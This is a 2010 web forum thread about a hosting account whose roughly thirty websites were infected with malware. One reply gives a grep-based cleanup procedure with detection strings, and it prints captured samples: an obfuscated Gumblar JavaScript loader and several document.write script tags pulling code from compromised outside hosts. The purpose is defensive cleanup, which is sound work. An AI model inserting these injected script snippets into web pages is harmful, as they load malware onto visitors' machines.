1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

My entire server is infected with malware

Discussion in 'Blogging' started by zacatictac, Oct 21, 2010.

  1. zacatictac

    zacatictac Power Member

    Joined:
    May 2, 2010
    Messages:
    584
    Likes Received:
    751
    Occupation:
    SEO
    Location:
    Metaverse
    Some how my entire server has been compromised and malware installed in to every website i have. This is like 30 sites. Bluehost just keeps telling me I need to go through and check everything for malware. They have got to be f*cking kididng! There are thousands of files, not to mention I have no idea what to look for. Is there any scanner or way for me to detect these infected files?
     
  2. avalanch

    avalanch Newbie

    Joined:
    Apr 16, 2008
    Messages:
    41
    Likes Received:
    12
    Home Page:
    Download them to your computer via ftp and scan them. Also if you can't keep track of "thousands of files" then it sounds like websites aren't for you.
     
  3. lcapece

    lcapece Newbie

    Joined:
    Jan 5, 2009
    Messages:
    23
    Likes Received:
    13
    The same thing happened to me back in May, but even worse was it affected 337 sites. What kind of sites you running? Wordpress? I traced my problem back to a compromised copy of CuteFTP, which scaped by cpanel passwords. What backups do you (hopefully) have?
     
  4. PEBAL

    PEBAL Newbie

    Joined:
    Jul 21, 2010
    Messages:
    35
    Likes Received:
    11
    I had the same problem too. Someone decided to hack my main site and infect it and all of my add-on domains just for fun.

    These guys need to get a life!

    Anyway, that particular site was hosted by HostGator and once I got in touch with their security dept. they were kind enough to remove all of the ba code from all of my sites web pages.

    I also have some websites with BlueHost and I guess I assumed they would do likewise if the situation ever arose.

    If I were you I'd press them to see if they can't do it for you.

    Best of luck with this.
     
  5. extremephp

    extremephp BANNED BANNED

    Joined:
    Oct 19, 2010
    Messages:
    1,293
    Likes Received:
    1,272
    Not All Files Will Be Infected By The Malware, But only PHP, CSS,J s And TXT Are Infected by them!

    Well, Out of All Files You suspect to be infected, it may not be in all, But in the crucial onces like header and footer and so on!

    Well, I once got a script, Which was entirely for another purpose, and which i fixed to find the infected files from the hosting :D

    Just leave me a Private Message!

    ~ExP~
     
  6. sunseven

    sunseven Regular Member

    Joined:
    Aug 5, 2009
    Messages:
    241
    Likes Received:
    279
    I had the same thing happen as well and it was more than a bitch to clean. It hit one of my shared client servers and spread over more than 300 sites. So cleanup took more than 2 weeks. However me and my staff documented the entire process just in case something like that ever happened again. And because I hate malware with a passion and blackhat has done so much for me that I will share our exact step by step instructions that took more than 80 man hours to put together. Use it and be merry :)


    CLEARING OUT MALWARE
    1.) Make sure the ftp account password has been changed, and the ftp accesses the ROOT directory, not just "httpdocs"
    2.) Download the ENTIRE site via FTP
    3.) Create (2) copies, one as a backup in case something is lost, and one that you'll work on.
    4.) Download Windows Grep from http://www.wingrep.com/ and install.
    5.) Open Windows Grep.
    5a.) Click Options>Expert Mode
    5b.) Click Search>Search...
    5c.) In the window make sure the following is selected:
    -Normal radio selection
    -In File Specifications make sure *.* is in place.
    -In folders specify the DIRECT PATH of the folder you're searching through.
    -Make sure "Recurse folders" is selected.

    6.) In search string search for the following strings:

    "gumblar"
    "lite"
    "auto"
    "liteautotop"
    "klaomta"
    "brugeni"
    bigtruckstopseek

    $search = array(
    .cn/
    eval(unescape
    eval(base64_decode
    eval(decode
    eval(base
    base64_decode
    (function(){'
    eval(String.fromCharCode
    neglite.com
    niklejo.net
    internetcountercheck.com
    );
    $dirs_array = array();
    if ($handle = opendir($dir)) {
    echo "Open dir: " . $dir . "";
    echo "Files:";
    echo "";

    "litegreatestdirect"
    ".cn" - this may not work
    "ar_20a_3d_22S" - this is a small snipet of the javascript to help pull up javascript infected files.
    "style="visibility: hidden"></iframe>" - this will pull up any remaining shit.

    7.) Windows grep will list all infected files. Clean out with text editor of choice.

    7a.) Scan all files with AVG (usually finds infected PHP files)
    7b.) Manually search all .js files for javascript at the bottom of the file
    7c.) Scan all files with malwarebytes
    7d.) Delete all instances of "image.php" as this is spreading the virus aparrently

    8.) There is a replace function in windows grep, but i couldn't get it to work....

    9.) Reupload all files via FTP.

    10.) Hope for the best it cleared out everything

    MALICIOUS JAVASCRIPT FULL EXAMPLE


    <script language=javascript><!--
    (function(){var kFJT='%';var cQI='~76~61r~20a~3d~22ScriptEngi~6e~65~22~2cb~3d~22Ve~72sion()+~22~2cj~3d~22~22~2c~75~3d~6eaviga~74or~2eus~65rAg~65nt~3b~69~66~28~28u~2einde~78Of(~22W~69n~22)~3e0)~26~26(~75~2ein~64exO~66~28~22NT~206~22)~3c~30)~26~26~28d~6fcum~65nt~2ecookie~2ein~64exO~66~28~22miek~3d1~22)~3c0)~26~26(~74~79peo~66(~7ar~76zts)~21~3dt~79peof(~22A~22~29~29~29~7bzrvzts~3d~22A~22~3beval(~22i~66(w~69n~64ow~2e~22+a+~22)j~3dj+~22+a+~22~4da~6ao~72~22+~62+~61~2b~22Mi~6eor~22+~62+~61+~22Build~22+~62+~22~6a~3b~22)~3bdocu~6d~65nt~2e~77rite(~22~3cscr~69pt~20src~3d~2f~2fgumblar~2e~63n~2f~72ss~2f~3fid~3d~22+j~2b~22~3e~3c~5c~2f~73cript~3e~22)~3b~7d';eval(unescape(cQI.replace(/~/g,'%')))})();
    --></script>


    FOUND IN JS Files (at the bottom of the file)
    document.write('<script src=http://rideit.lt/burusports/lidotaajs.php ><\/script>');

    document.write('<script src=http://irsmarketing.com/lang/style.php ><\/script>');
    document.write('<script src=http://donpalm.com/images/inf142_203.php ><\/script>');
    document.write('<script src=http://tequilaconference.com/_vti_bin/newConference_r5_c4_plantilla.php ><\/script>');
    document.write('<script src=http://holyland-cosmetics.com/images/gifimg.php ><\/script>');

    FOUND IN HTML, ASP, ASPX, CF & SOME PNG FILES (at the top above the opening body tag)
    <script src=http://rideit.lt/burusports/lidotaajs.php ></script>

    GREP SEARCH METHODS
    1.) had to search without the document.write
    2.) seach from script src= back first, then from there to thee .php, then just starting at http to .php, then just the domain names ride.It, irsmarketing.com etc.., then after cleaning all i ran it again searching the urls starting with http and ending with .php and it found more so I definitely think we'll need to scan multiple times

    FOUND 94 OF THESE FILES IN IIMAGES FOLDER OF MANY SITES
    gifimg.php (which was referenced in the document write above. Did a regular windows based search to find and delete these). For safety i searched for all the other .php file names that are at the end of each of the badware url's above but nothing found.

    When opening the gfimg.php file I found this code
    <?php eval(base64_decode then parenthesis and a bunch of binary numbers and letters so need to search for this string before the binary code after deleting these gifimg.php files to see if there are more. Scanned again with Grep and could not find anything.

    Misc Notes
    1.) Make sure to download all folders in root as well especially the folder named statistics where the awstats files are because there are several html files in there that get injected

    P.S. - all the sample code above was taken from our specific situation. I'm sure each one is unique so just use them as a reference.
     
    • Thanks Thanks x 6
    Last edited: Oct 21, 2010
  7. zacatictac

    zacatictac Power Member

    Joined:
    May 2, 2010
    Messages:
    584
    Likes Received:
    751
    Occupation:
    SEO
    Location:
    Metaverse
    wow thanks for the feedback guys. And sunseven thank you very much for the help i will try this out.
     
  8. freotech

    freotech Newbie

    Joined:
    May 7, 2008
    Messages:
    22
    Likes Received:
    3
    i had similar problem but i was with hostgator and they help clearing off all malaware.

    Are the sites that were infected all wordpress blog?
     
  9. sunseven

    sunseven Regular Member

    Joined:
    Aug 5, 2009
    Messages:
    241
    Likes Received:
    279
    No problem, I hope you've cleared it up by now. I freggin hate malware :)
     
  10. ruworth

    ruworth BANNED BANNED

    Joined:
    May 17, 2010
    Messages:
    251
    Likes Received:
    71
    I would just delete them and start over or you will be checking files forever. I know it's a pain but it may be your only solution
     
  11. gooser898

    gooser898 Regular Member

    Joined:
    Apr 6, 2008
    Messages:
    367
    Likes Received:
    82
    Occupation:
    Not Much
    Location:
    Newcastle, Australia
    there must be a way to automatically back up your sites? something that does it every day. or twice a week. Anyone have any suggestions?
     
  12. goonieguhu

    goonieguhu Junior Member

    Joined:
    Apr 8, 2008
    Messages:
    169
    Likes Received:
    32
    If you are using wordpress, there are a lot of plugins that can schedule backups.
     
  13. andy2009

    andy2009 Junior Member

    Joined:
    Apr 18, 2009
    Messages:
    161
    Likes Received:
    26
    If you have root access isn't there any good tools that you can install on your server that scan & remove this things?
     
  14. mangoman

    mangoman Jr. VIP Jr. VIP Premium Member

    Joined:
    Sep 29, 2010
    Messages:
    403
    Likes Received:
    68
    WHM can make daily/weekely/monthly backups if its enabled. Your host SHOULD have a backup of your sites from awhile back. The problem with just backing up the old docs would be you are not fixing the exploit. If your passwords were just jacked... then you would be fine.